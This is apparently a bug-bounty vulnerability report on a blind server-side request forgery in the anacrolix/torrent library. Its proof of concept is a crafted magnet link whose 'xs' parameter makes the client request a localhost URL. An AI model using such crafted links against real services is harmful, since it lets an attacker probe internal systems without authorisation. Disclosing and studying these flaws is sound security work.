Server-Side Request Forgery (SSRF) in anacrolix/torrent

Valid
Reported on May 24th 2021

✍️ Description

I have confirmed SSRF vulnerability in `anacrolix/torrent.

🕵️‍♂️ Proof of Concept

  1. Open a port over localhost (python3 -m http.server 5000)
  2. Run this command torrent download 'magnet:?xt=urn:btih:08ada5a7a6183aae1e09d831df6748d566095a10&dn=Sintel&xs=http://localhost:5000'

*Now you will see in HTTP logs that a GET request was received *

💥 Impact

This could be exploited if the user copies a malicious magnet link for downloading through anacrolix/torrent or if a there is webserver that takes user magnet URL for downloading files with the use of anacrolix/torrent

Refernces

https://github.com/assetnote/blind-ssrf-chains

https://portswigger.net/web-security/ssrf/blind